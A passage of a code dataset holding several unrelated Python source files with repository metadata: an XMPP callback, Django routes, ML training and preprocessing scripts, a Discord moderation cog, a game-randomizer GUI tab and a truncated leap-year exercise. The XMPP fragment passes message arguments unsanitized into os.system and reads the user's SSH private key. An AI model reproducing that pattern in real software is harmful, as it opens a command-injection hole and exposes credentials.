self.log.debug('args:%s'%args.items(), extra={'namespace' : 'xmpp'})\n \n source_port = args.get('source_port', '22')\n on_port = args.get('on_port', '9090')\n connect_to_host = args.get('connect_to_host', 'ibox@www.pinet.cc')\n #path = '/usr/local/src/RestXMPP/bin/'\n path = '/home/spirit/work/git_test/RestXMPP/bin'\n cmd = 'cd %s ; sh ssh_xmpp %s %s %s '%(path, on_port, source_port, connect_to_host) \n self.log.debug('cmd:%s '%cmd, extra={'namespace' : 'xmpp'})\n os.system(cmd)\n result = 'OK SSH Tunnel'\n return result \n \"\"\"\n def decode_crypt(self,str_src):\n\n self.log.debug('enter decode ', extra={'namespace' : 'xmpp'})\n home = os.path.expanduser('~')\n self.log.debug('home:%s'%home, extra={'namespace' : 'xmpp'})\n f = open('%s/.ssh/id_rsa'%(home),'r')\n self.log.debug('f:%s'%f, extra={'namespace' : 'xmpp'})\n r = f.read()\n key = RSA.importKey(r)\n self.log.debug('key:%s'%key, extra={'namespace' : 'xmpp'})\n #if key.has_private(): print \"Private key\"\n s1 = key.decrypt(str_src) \n print '-' * 30\n print s1\n return s1\n \"\"\"\n \"\"\"\n def decode_crypt(str_src):\n home = os.path.expanduser('~')\n f = open('%s/.ssh/id_rsa'%(home),'r')\n r = f.read()\n print r\n key = RSA.importKey(r)\n #if key.has_private(): print \"Private key\"\n s1 = key.decrypt(str_src) \n return s1\n \"\"\"\n","repo_name":"spartacus429496/restxmpp_backup","sub_path":"callbacks/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38509464821","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('',home,name='home'),\n path('productlist/',productList,name='productList'),\n path('productdetail//',productDetail,name='productDetail'),\n path('productcreate/',productCreate,name='productCreate'),\n path('productupdate//',productUpdate,name='productUpdate'),\n path('productdelete//',productDelete,name='productDelete'),\n]\n","repo_name":"sachinspeaks/DRF-api","sub_path":"core/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20439056261","text":"# import os\n# import shutil \n# imgs_path = \"../img\"\n# segs_path = \"../mask1\"\n# train_path = \"../dataset_30000/train\"\n# val_path = \"../dataset_30000/val\"\n# test_path = \"../dataset_30000/test\"\n# for ia in range(18000):\n# shutil.copyfile(f'{imgs_path}/{ia}.jpg',f\"{train_path}/{ia}.jpg\")\n# for ia in range(18000,21000):\n# shutil.copyfile(f'{imgs_path}/{ia}.jpg',f\"{train_path}/{ia}.jpg\")\n# for ia in range(21000,30000):\n# shutil.copyfile(f'{imgs_path}/{ia}.jpg',f\"{test_path}/{ia}.jpg\")\n\n\nfrom keras_segmentation.data_utils.data_loader import *\nfrom keras_segmentation.data_utils.visualize_dataset import *\n\nimg_path = \"dataset1/train\"\nano_img_path = \"dataset1/ano_train\"\n# img_path = \"dataset1/test\"\n# ano_img_path = \"dataset1/ano_test\"\nimg_path = \"dataset1/val\"\nano_img_path = \"dataset1/ano_val\"\nimg_path = \"demo/test\"\nano_img_path = \"demo/ano_test\"\n# verify_segmentation_dataset(img_path,ano_img_path,12,False,False)\n\n# \n# visuallize\nvisualize_segmentation_dataset(images_path=img_path,segs_path=ano_img_path,n_classes=12,no_show=False)\n# for seg_img, seg_path in visualize_segmentation_dataset(images_path=img_path,segs_path=ano_img_path,n_classes=12,no_show=True):\n# \tcv2.imwrite(f\"demo/ano_colors/{seg_path.split('/')[-1]}\", seg_img)\n\n\"\"\"\n0:sky\n1:building\n2:pole #cột đèn\n3:road\n4:sidewalk\n5:vegetation\n6:traffic light\n7:fence\n8:car\n9:person\n10:rider\n11:static\n\"\"\"","repo_name":"quyvsquy/demoUnet_Segnet_FCN_PSPnet_","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18497206959","text":"\ndef arithmetic_arranger(list, x = False):\n if len(list) > 5 : return ('Error: Too many problems.')\n \n new_list = []\n for item in list:\n if '*' in item or '/' in item:\n return (\"Error: Operator must be '+' or '-'.\")\n new_list.append(item.split())\n \n for i in new_list:\n if not i[0].isdigit() or not i[2].isdigit():\n return ('Error: Numbers must only contain digits.')\n if len(i[0]) > 5 or len(i[2]) > 5: \n return ('Error: Numbers cannot be more than four digits.')\n \n if i[1] == '+':\n result = int(i[0]) + int(i[2])\n i.append(str(result))\n else:\n result = int(i[0]) - int(i[2])\n i.append(str(result))\n \n list_one = []\n list_two = []\n list_three = []\n list_four = [] \n\n for item in new_list:\n if len(item[0]) < len(item[2]):\n space = ' ' * (len(item[2]) - len(item[0]))\n list_one.append(' ' + space + item[0])\n list_two.append(item[1] + ' ' + item[2])\n list_three.append('-' * len(item[1] + ' ' + item[2]))\n if len(item[3]) == len(item[2]):\n list_four.append( ' ' + item[3])\n elif len(item[3]) > len(item[2]):\n list_four.append( ' ' + item[3])\n else:\n list_four.append( ' ' + item[3])\n else: \n space = ' ' * (len(item[0]) - len(item[2]))\n list_one.append(' ' + item[0])\n list_two.append(item[1] + ' ' + space + item[2])\n list_three.append('-' * len(item[1] + ' ' + item[0]))\n trick = ' ' * (len(item[0]) - len(item[3]))\n list_four.append(' ' + trick + item[3])\n if x:\n return (' '.join(list_one) + '\\n' + ' '.join(list_two) + '\\n' + ' '.join(list_three) + '\\n' + ' '.join(list_four))\n else:\n return (' '.join(list_one) + '\\n' + ' '.join(list_two) + '\\n' + ' '.join(list_three))\n \n\n\nprint(arithmetic_arranger([\"10901 - 10\", \"40 - 100\", \"40 - 405\", \"3 + 409\"], x = False))\n","repo_name":"pierrebomfim/freecodecamp-projects","sub_path":"arithmetic-formatter.py","file_name":"arithmetic-formatter.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16336876206","text":"from django.urls import path\n\nfrom gain_knowledge.main.views import CategoryListView, CourseDetailView, display_question, final_score, \\\n HomeView, CoursesListView, TestsListView, CreateCourseView, UserCoursesListView, CourseEditView, CourseDeleteView, \\\n UserTestsListView, CreateTestView, EditTestView, DeleteTestView, UserQuestionsListView, CreateQuestionView, \\\n DeleteQuestionView, EditQuestionView, QuestionDetailView\n\nurlpatterns = [\n path('', HomeView.as_view(), name='index'),\n path('categories/', CategoryListView.as_view(), name='list categories'),\n path('categories/', CoursesListView.as_view(), name='list courses'),\n path('course/', CourseDetailView.as_view(), name='courses details'),\n path('tests/', TestsListView.as_view(), name='list tests'),\n path('question//', display_question, name='display question'),\n path('final_score/', final_score, name='final score'),\n path('create_course/', CreateCourseView.as_view(), name='create course'),\n path('user_courses/', UserCoursesListView.as_view(), name='user list courses'),\n path('edit_course/', CourseEditView.as_view(), name='edit course'),\n path('delete_course/', CourseDeleteView.as_view(), name='delete course'),\n path('user_tests/', UserTestsListView.as_view(), name='user list tests'),\n path('create_test/', CreateTestView.as_view(), name='create test'),\n path('edit_test/', EditTestView.as_view(), name='edit test'),\n path('delete_test/', DeleteTestView.as_view(), name='delete test'),\n path('user_questions/', UserQuestionsListView.as_view(), name='user list questions'),\n path('create_question/', CreateQuestionView.as_view(), name='create question'),\n path('delete_question/', DeleteQuestionView.as_view(), name='delete question'),\n path('edit_question/', EditQuestionView.as_view(), name='edit question'),\n path('show_question/', QuestionDetailView.as_view(), name='show question'),\n]","repo_name":"nikozhuharov/gain_knowledge","sub_path":"gain_knowledge/gain_knowledge/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2223236890","text":"import torch\nfrom torch import Tensor\nimport config as cfg\nfrom torch.nn.functional import mse_loss, one_hot\nfrom instructors.base import Instructor\nimport numpy as np\nfrom torch.utils.data.dataset import TensorDataset\nfrom torch import optim\nfrom utils.metric import nll_gaussian\nfrom torch.optim.lr_scheduler import StepLR\n\n\nclass XNRIDECIns(Instructor):\n \"\"\"\n Train the decoder given the ground truth relations.\n \"\"\"\n def __init__(self, model: torch.nn.DataParallel, data: dict, es: np.ndarray, cmd):\n \"\"\"\n Args:\n model: an auto-encoder\n data: train / val /test set\n es: edge list\n cmd: command line parameters\n \"\"\"\n super(XNRIDECIns, self).__init__(cmd)\n self.model = model\n self.data = {key: TensorDataset(value[0], value[1])\n for key, value in data.items()}\n self.es = torch.LongTensor(es)\n # number of nodes\n self.size = cmd.size\n self.batch_size = cmd.batch\n # optimizer\n self.opt = optim.Adam(self.model.parameters(), lr=cfg.lr)\n # learning rate scheduler, same as in NRI\n self.scheduler = StepLR(self.opt, step_size=cfg.lr_decay, gamma=cfg.gamma)\n\n def train(self):\n # use the loss as the metric for model selection, default: +\\infty\n val_best = np.inf\n # path to save the current best model\n prefix = '/'.join(cfg.log.split('/')[:-1])\n name = '{}/best.pth'.format(prefix)\n for epoch in range(1, 1 + self.cmd.epochs):\n self.model.train()\n # shuffle the data at each epoch\n data = self.load_data(self.data['train'], self.batch_size)\n loss_a = 0.\n N = 0.\n for adj, states in data:\n if cfg.gpu:\n adj = adj.cuda()\n states = states.cuda()\n scale = len(states) / self.batch_size\n # N: number of samples, equal to the batch size with possible exception for the last batch\n N += scale\n loss_a += scale * self.train_nri(states, adj)\n loss_a /= N \n self.log.info('epoch {:03d} loss {:.3e}'.format(epoch, loss_a))\n losses = self.report('val', [cfg.M])\n\n val_cur = losses[0]\n if val_cur < val_best:\n # update the current best model when approaching a lower loss\n val_best = val_cur\n torch.save(self.model.module.state_dict(), name)\n\n # learning rate scheduling\n self.scheduler.step()\n if self.cmd.epochs > 0:\n self.model.module.load_state_dict(torch.load(name))\n _ = self.test('test', 20)\n\n def report(self, name: str, Ms: list) -> list:\n \"\"\"\n Evaluate the mean squared errors.\n\n Args:\n name: 'train' / 'val' / 'test'\n Ms: [...], each element is a number of steps to predict\n \n Return:\n mses: [...], mean squared errors over all steps\n \"\"\"\n mses = []\n for M in Ms:\n mse, ratio = self.evaluate(self.data[name], M)\n mses.append(mse)\n self.log.info('{} M {:02d} mse {:.3e} ratio {:.4f}'.format(\n name, M, mse, ratio))\n return mses\n\n def train_nri(self, states: Tensor, adj: Tensor) -> Tensor:\n \"\"\"\n Args:\n states: [batch, step, node, dim], observed node states\n adj: [batch, E, K], ground truth interacting relations\n\n Return:\n loss: reconstruction loss\n \"\"\"\n output = self.model.module.predict_states(states, one_hot(adj.transpose(0, 1)).float(), cfg.M)\n loss = nll_gaussian(output, states[:, 1:], 5e-5)\n self.optimize(self.opt, loss * cfg.scale)\n return loss\n\n def evaluate(self, test, M: int):\n \"\"\"\n Evaluate related metrics to monitor the training process.\n\n Args:\n test: data set to be evaluted\n M: number of steps to predict\n\n Return: \n mse: mean square error over all steps\n ratio: relative root mean squared error\n \"\"\"\n mse, ratio = [], []\n data = self.load_data(test, self.batch_size)\n N = 0.\n with torch.no_grad():\n for adj, states in data:\n if cfg.gpu:\n adj = adj.cuda()\n states = states.cuda()\n states_dec = states[:, -cfg.train_steps:, :, :]\n target = states_dec[:, 1:]\n \n output = self.model.module.predict_states(states_dec, one_hot(adj.transpose(0, 1)).float(), M)\n # scale all metrics to match the batch size\n scale = len(states) / self.batch_size\n N += scale\n\n mse.append(scale * mse_loss(output, target).data)\n ratio.append(scale * (((output - target) ** 2).sum(-1).sqrt() / (target ** 2).sum(-1).sqrt()).mean())\n mse = sum(mse) / N\n ratio = sum(ratio) / N\n return mse, ratio\n\n def test(self, name: str, M: int):\n \"\"\"\n Evaluate related metrics to measure the model performance.\n The biggest difference between this function and evalute() is that, the mses are evaluated at each step.\n\n Args:\n name: 'train' / 'val' / 'test'\n M: number of steps to predict\n\n Return:\n mse_multi: mse at each step\n \"\"\"\n \"\"\"\n mses: mean square error over all steps\n ratio: relative root mean squared error\n mse_multi: mse at each step\n \"\"\"\n mse_multi, mses, ratio = [], [], []\n data = self.load_data(self.data[name], self.batch_size)\n N = 0.\n with torch.no_grad():\n for adj, states in data:\n if cfg.gpu:\n adj = adj.cuda()\n states = states.cuda()\n states_dec = states[:, -cfg.train_steps:, :, :]\n target = states_dec[:, 1:]\n \n output = self.model.module.predict_states(states_dec, one_hot(adj.transpose(0, 1)).float(), cfg.M)\n # scale all metrics to match the batch size\n scale = len(states) / self.batch_size\n N += scale\n\n mses.append(scale * mse_loss(output, target).data)\n ratio.append(scale * (((output - target) ** 2).sum(-1).sqrt() / (target ** 2).sum(-1).sqrt()).mean())\n\n states_dec = states[:, cfg.train_steps:cfg.train_steps+M+1, :, :]\n target = states_dec[:, 1:]\n \n output = self.model.module.predict_states(states_dec, one_hot(adj.transpose(0, 1)).float(), M)\n mse = ((output - target) ** 2).mean(dim=(0, 2, -1))\n mse *= scale\n mse_multi.append(mse)\n mses = sum(mses) / N\n mse_multi = sum(mse_multi) / N\n ratio = sum(ratio) / N\n self.log.info('{} M {:02d} mse {:.3e} ratio {:.4f}'.format(\n name, M, mses, ratio,))\n msteps = ','.join(['{:.3e}'.format(i) for i in mse_multi])\n self.log.info(msteps)\n return mse_multi\n","repo_name":"hilbert9221/NRI-MPM","sub_path":"instructors/XNRI_dec.py","file_name":"XNRI_dec.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"21126945756","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef func(x):\n # 直接返回函数\n return np.exp(-x*x/(2*155.2*155.2))\n\n\ndef plot_func():\n # param:起点,终点,间距\n x = np.arange(0, 1552//2, 0.01)\n y = func(x)\n plt.plot(x, y)\n plt.show()\n\n\nif __name__ == '__main__':\n plot_func()\n","repo_name":"Sherhang/MyStudy","sub_path":"Python/PythonCodeInTest/函数图像测试/one_dimension.py","file_name":"one_dimension.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13319129122","text":"import discord\nfrom discord.ext import commands\n\nfrom functions import send_message # pylint: disable=import-error\n\n\nclass Users(commands.Cog):\n \"\"\"\n Commands related to Users.\n \"\"\"\n def __init__(self, client):\n self.client = client\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.command(brief=\"Send avatar picture of an user.\",\n aliases=[\"uavatar\"])\n async def useravatar(self, ctx, member: discord.Member = None):\n \"\"\"\n Send avatar picture of a specified user.\n \"\"\"\n member = member if member is not None else ctx.message.author\n await send_message(ctx, member.avatar_url)\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_permissions(kick_members=True)\n @commands.bot_has_permissions(kick_members=True)\n @commands.command(brief=\"Kick an user.\")\n async def kick(self, ctx, member: discord.Member, *, reason=None):\n \"\"\"\n Kick an user.\n \"\"\"\n try:\n await member.kick(reason=reason)\n except discord.errors.Forbidden:\n await send_message(ctx, \"That user is too powerful...\")\n else:\n await send_message(ctx, f\"Kicked {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n @commands.command(brief=\"Ban an user.\")\n async def ban(self, ctx, member: discord.Member, *, reason=None):\n \"\"\"\n Ban un user.\n \"\"\"\n try:\n await member.ban(reason=reason)\n except discord.errors.Forbidden:\n await send_message(ctx, \"That user is too powerful...\")\n else:\n await send_message(ctx, f\"Banned {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n @commands.command(brief=\"Unban an user.\")\n async def unban(self, ctx, *, member):\n \"\"\"\n Unban an user.\n Use the format username#discriminator\n \"\"\"\n banned_users = await ctx.guild.bans()\n\n try:\n member_name, member_disc = member.split('#')\n except ValueError:\n await send_message(ctx, \"Invalid format! \"\n \"Make sure to include \"\n \"the user's discriminator: User#0000\")\n return\n else:\n for bans in banned_users:\n if (bans.user.name, bans.user.discriminator) == \\\n (member_name, member_disc):\n await ctx.guild.unban(bans.user)\n await send_message(ctx, f\"Unbanned {bans.user.mention}.\")\n return\n\n await send_message(ctx, \"User not found. Make sure to \"\n \"differentiate capital letters.\")\n\n @commands.cooldown(1, 5, commands.BucketType.user)\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n @commands.command(brief=\"List of all banned users and reason for the ban.\",\n aliases=[\"bl\"])\n async def banlist(self, ctx):\n \"\"\"\n List of all banned users and reason for the ban, if there's one.\n \"\"\"\n banned_users = await ctx.guild.bans()\n message = \"\"\n\n if len(banned_users):\n message = (f\"{person.user.mention} - \"\n f\"{person.user.name}#{person.user.discriminator}\\n\"\n f\"Reason: {person.reason}\" for person in banned_users)\n\n await send_message(ctx, \"\\n\".join(message))\n else:\n await send_message(ctx, \"No banned users in this server!\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(mute_members=True)\n @commands.bot_has_guild_permissions(mute_members=True)\n @commands.command(brief=\"Mute an user.\")\n async def mute(self, ctx, member: discord.Member):\n \"\"\"\n Mute an user microphone.\n \"\"\"\n try:\n await member.edit(mute=True)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Muted {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(mute_members=True)\n @commands.bot_has_guild_permissions(mute_members=True)\n @commands.command(brief=\"Unmute an user.\")\n async def unmute(self, ctx, member: discord.Member):\n \"\"\"\n Unmute an user microhphone.\n \"\"\"\n try:\n await member.edit(mute=False)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Unmuted {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(deafen_members=True)\n @commands.bot_has_guild_permissions(deafen_members=True)\n @commands.command(brief=\"Deafen an user.\")\n async def deafen(self, ctx, member: discord.Member):\n \"\"\"\n Deafen an user audio.\n \"\"\"\n try:\n await member.edit(deafen=True)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Deafened {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(deafen_members=True)\n @commands.bot_has_guild_permissions(deafen_members=True)\n @commands.command(brief=\"Undeafen an user.\")\n async def undeafen(self, ctx, member: discord.Member):\n \"\"\"\n Undeafen an user audio.\n \"\"\"\n try:\n await member.edit(deafen=False)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Undeafened {member.mention}.\")\n\n @kick.error\n @ban.error\n @mute.error\n @unmute.error\n @deafen.error\n @undeafen.error\n async def member_error(self, ctx, error):\n \"\"\"\n Checks if member exists.\n \"\"\"\n if isinstance(error, commands.BadArgument):\n await send_message(ctx, \"Unknown user.\")\n\n\ndef setup(client):\n \"\"\"\n Setup the Cog.\n \"\"\"\n client.add_cog(Users(client))\n","repo_name":"victorborneo/SatenBot","sub_path":"cogs/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":6547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36674607756","text":"import typing\n\nfrom PySide6 import QtWidgets\n\nfrom randovania.game_description.game_description import GameDescription\nfrom randovania.games.prime1.layout.prime_configuration import LayoutCutsceneMode\nfrom randovania.gui.generated.preset_prime_qol_ui import Ui_PresetPrimeQol\nfrom randovania.gui.lib import signal_handling\nfrom randovania.gui.lib.window_manager import WindowManager\nfrom randovania.gui.preset_settings.preset_tab import PresetTab\nfrom randovania.interface_common.preset_editor import PresetEditor\nfrom randovania.layout.preset import Preset\n\n_FIELDS = [\n \"warp_to_start\",\n \"main_plaza_door\",\n \"blue_save_doors\",\n \"backwards_frigate\",\n \"backwards_labs\",\n \"backwards_upper_mines\",\n \"backwards_lower_mines\",\n \"phazon_elite_without_dynamo\",\n \"spring_ball\",\n]\n\nclass PresetPrimeQol(PresetTab, Ui_PresetPrimeQol):\n def __init__(self, editor: PresetEditor, game_description: GameDescription, window_manager: WindowManager):\n super().__init__(editor, game_description, window_manager)\n self.setupUi(self)\n\n self.description_label.setText(self.description_label.text().replace(\"color:#0000ff;\", \"\"))\n\n # Signals\n self.cutscene_combo.setItemData(0, LayoutCutsceneMode.ORIGINAL)\n self.cutscene_combo.setItemData(1, LayoutCutsceneMode.COMPETITIVE)\n self.cutscene_combo.setItemData(2, LayoutCutsceneMode.MINOR)\n self.cutscene_combo.setItemData(3, LayoutCutsceneMode.MAJOR)\n signal_handling.on_combo(self.cutscene_combo, self._on_cutscene_changed)\n for f in _FIELDS:\n self._add_persist_option(getattr(self, f\"{f}_check\"), f)\n\n @classmethod\n def tab_title(cls) -> str:\n return \"Quality of Life\"\n\n @classmethod\n def uses_patches_tab(cls) -> bool:\n return True\n\n def _add_persist_option(self, check: QtWidgets.QCheckBox, attribute_name: str):\n def persist(value: bool):\n with self._editor as editor:\n editor.set_configuration_field(attribute_name, value)\n\n signal_handling.on_checked(check, persist)\n\n def _on_cutscene_changed(self, value: LayoutCutsceneMode):\n with self._editor as editor:\n editor.set_configuration_field(\"qol_cutscenes\", value)\n\n def on_preset_changed(self, preset: Preset):\n config = preset.configuration\n for f in _FIELDS:\n typing.cast(QtWidgets.QCheckBox, getattr(self, f\"{f}_check\")).setChecked(getattr(config, f))\n signal_handling.set_combo_with_value(self.cutscene_combo, config.qol_cutscenes)\n","repo_name":"HighC914/randovania","sub_path":"randovania/games/prime1/gui/preset_settings/prime_patches_qol.py","file_name":"prime_patches_qol.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"8266905790","text":"import os\nimport jieba\nimport time\nimport codecs\n\nfrom tensorflow.keras.utils import to_categorical\n\nfrom src.utils.utils import read_file, ensure_dir, save_pkl, load_pkl, get_time_idf\nfrom src.utils.config import config\nfrom src.utils.Enconde import TextEnconde\n\n\ndef build_vocab(texts, out_path):\n vocab = TextEnconde()\n for text in texts:\n vocab.add_sentences(text)\n vocab.trim(config.min_freq)\n\n ensure_dir(out_path)\n\n vocab_path = os.path.join(out_path, 'vocab.pkl')\n vocab_txt = os.path.join(out_path, 'vocab.txt')\n\n save_pkl(vocab_path, vocab, 'vocab')\n\n with codecs.open(vocab_txt, 'w', encoding='utf-8') as f:\n f.write(os.linesep.join([word for word in vocab.word2id.keys()]))\n\n return vocab, vocab_txt\n\n\ndef get_data(datas):\n entity_ones, entity_twos = [], []\n texts, relations = [], []\n pos = []\n jieba.add_word('HEAD')\n jieba.add_word('TAIL')\n for data in datas:\n all_datas = data.strip().split('\\t')\n entity_one = all_datas[0]\n entity_two = all_datas[1]\n relation = all_datas[2]\n text = all_datas[3]\n if len(entity_two) < len(entity_one):\n text = text.replace(entity_one, 'HEAD').replace(entity_two, 'TAIL')\n else:\n text = text.replace(entity_two, 'TAIL').replace(entity_one, 'HEAD')\n text = jieba.lcut(text)\n\n head_pos, tail_pos = text.index('HEAD'), text.index('TAIL')\n\n text[head_pos] = entity_one\n text[tail_pos] = entity_two\n\n entity_ones.append(entity_one)\n entity_twos.append(entity_two)\n relations.append(relation)\n texts.append(text)\n pos.append([head_pos, tail_pos])\n\n return entity_ones, entity_twos, relations, pos, texts\n\n\ndef get_pos_feature(sent_len, entities_pos, entity_len, pos_limit):\n \"\"\"\n 获取位置编码\n :param sent_len:\n :param entities_pos:\n :param entity_len:\n :param pos_limit:\n :return:\n \"\"\"\n left = list(range(-entities_pos, 0))\n middle = [0] * entity_len\n right = list(range(1, sent_len - entities_pos - entity_len + 1))\n pos = left + middle + right\n\n for i, p in enumerate(pos):\n if p > pos_limit:\n pos[i] = pos_limit\n if p < -pos_limit:\n pos[i] = -pos_limit\n pos = [p + pos_limit + 1 for p in pos]\n\n return pos\n\n\ndef get_mask_feature(sent_len, entities_pos):\n \"\"\"\n 获取mask编码\n :param sent_len:\n :param entities_pos:\n :return:\n \"\"\"\n left = [1] * (entities_pos[0] + 1)\n middle = [2] * (entities_pos[1] - entities_pos[0] - 1)\n right = [3] * (sent_len - entities_pos[1])\n return left + middle + right\n\n\ndef build_data(datas, vocab):\n sents = []\n head_pos = []\n tail_pos = []\n mask_pos = []\n\n entity_ones, entity_twos, pos, texts = datas\n for i, sent in enumerate(texts):\n text = [vocab.word2id.get(word, 0) for word in sent]\n head, tail = int(pos[i][0]), int(pos[i][1])\n entities_pos = [head, tail] if tail > head else [tail, head]\n head_p = get_pos_feature(len(sent), head, 1, config.pos_limit)\n tail_p = get_pos_feature(len(sent), tail, 1, config.pos_limit)\n mask_p = get_mask_feature(len(sent), entities_pos)\n\n sents.append(text)\n head_pos.append(head_p)\n tail_pos.append(tail_p)\n mask_pos.append(mask_p)\n return sents, head_pos, tail_pos, mask_pos\n\n\ndef get_relation2id(config):\n path = os.path.join(config.data_path, 'relation2id.txt')\n pkl_path = os.path.join(config.out_path, 'relation2id.pkl')\n if os.path.exists(pkl_path):\n relation2id = load_pkl(pkl_path, 'relation2id')\n else:\n relation2id = {}\n with codecs.open(path, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n lines = line.strip().split(' ')\n relation2id[lines[0]] = int(lines[1])\n save_pkl(pkl_path, relation2id, 'relation2id')\n return relation2id\n\n\ndef relation_tokenize(config, relation):\n relation2id = get_relation2id(config)\n relations = []\n for rel in relation:\n relations.append(relation2id.get(rel, 0))\n relations = to_categorical(relations, num_classes=config.relation_type, dtype='int32')\n return relations\n\n\ndef process(config):\n ensure_dir(config.out_path)\n\n print('数据预处理开始')\n start_time = time.time()\n\n print('读取数据')\n train_data = read_file(os.path.join(config.data_path, 'train.txt'))\n test_data = read_file(os.path.join(config.data_path, 'test.txt'))\n\n print('预处理数据')\n train_entity_ones, train_entity_twos, train_relations, train_pos, train_texts = get_data(train_data)\n test_entity_ones, test_entity_twos, test_relations, test_pos, test_texts = get_data(test_data)\n train_data = [train_entity_ones, train_entity_twos, train_pos, train_texts]\n test_data = [test_entity_ones, test_entity_twos, test_pos, test_texts]\n\n all_texts = test_texts + train_texts\n\n print('建立词表')\n vocab, vocab_path = build_vocab(all_texts, config.out_path)\n\n print('构建模型数据')\n train_sents, train_head_pos, train_tail_pos, train_mask = build_data(train_data, vocab)\n test_sents, test_head_pos, test_tail_pos, test_mask = build_data(test_data, vocab)\n\n print('构建关系型数据')\n train_relations_token = relation_tokenize(config, train_relations)\n test_relations_token = relation_tokenize(config, test_relations)\n\n train_data = (train_sents, train_head_pos, train_tail_pos, train_mask, train_relations_token)\n\n test_data = (test_sents, test_head_pos, test_tail_pos, test_mask, test_relations_token)\n\n train_data_path = os.path.join(config.out_path, 'train.pkl')\n test_data_path = os.path.join(config.out_path, 'test.pkl')\n\n save_pkl(train_data_path, train_data, 'train_data')\n save_pkl(test_data_path, test_data, 'test_data')\n\n end_time = get_time_idf(start_time)\n print(f'数据预处理结束, 用时{end_time}')\n\n\nif __name__ == '__main__':\n process(config)\n\n\n\n\n\n\n","repo_name":"qq1065507891/tf2_nre","sub_path":"src/utils/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35275226620","text":"from game.Dice import Dice\nimport Language\n\npage_dialog = Language.dialogs[\"dungeon_crawler\"][\"classes\"][\"game\"][\"character\"]\n\nclass Character:\n\n def __init__(self, name, maxHealth, force, gold, armor=0):\n self.name = name\n self.health = maxHealth\n self.maxHealth = maxHealth\n self.force = force\n self.gold = gold\n self.armor = armor\n\n def fight(self, other):\n attackRoll = Dice().get_value()\n defenseRoll = Dice().get_value()\n\n if defenseRoll > attackRoll:\n print(page_dialog[\"defense_sup_attaque\"] % (self.name, other.name, other.name))\n\n elif attackRoll == defenseRoll:\n print(page_dialog[\"defense_equal_attaque\"] % (self.name, other.name))\n otherDammages = max(0, (self.force / 2) - (other.armor / 10))\n selfDammages = max(0, (other.force / 2) - (self.armor / 10))\n other.health -= otherDammages\n self.health -= selfDammages\n displayLifePointsLost(self.name, selfDammages)\n displayLifePointsLost(other.name, otherDammages)\n else:\n print(page_dialog[\"defense_inf_attaque\"] % (self.name, other.name))\n otherDammages = max(0, self.force - (other.armor / 10))\n other.health -= otherDammages\n displayLifePointsLost(other.name, otherDammages)\n\n\ndef displayLifePointsLost(characterHealth, pointsLost):\n print(page_dialog[\"lose_hp\"] % (characterHealth, pointsLost), end=\"\\n\\n\")\n","repo_name":"reda-maizate/projet-python","sub_path":"characters/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31264261686","text":"''' https://www.acmicpc.net/problem/2753\t 윤년\t\t \n문제\n연도가 주어졌을 때, 윤년이면 1, 아니면 0을 출력하는 프로그램을 작성하시오. \n윤년은 연도가 4의 배수이면서, 100의 배수가 아닐 때 또는 400의 배수일 때이다.\n\nex )2012년은 4의 배수O 100의 배수X 윤년O \n1900년 100의 배수 O 400의 배수X -> 윤년X 2000년 400의 배수 -> 윤년O\n\n입력\n첫째 줄에 연도가 주어진다. 연도는 1보다 크거나 같고, 4000보다 작거나 같은 자연수이다.\n\n출력\n첫째 줄에 윤년이면 1, 아니면 0을 출력한다.\n\n예제 입력 1 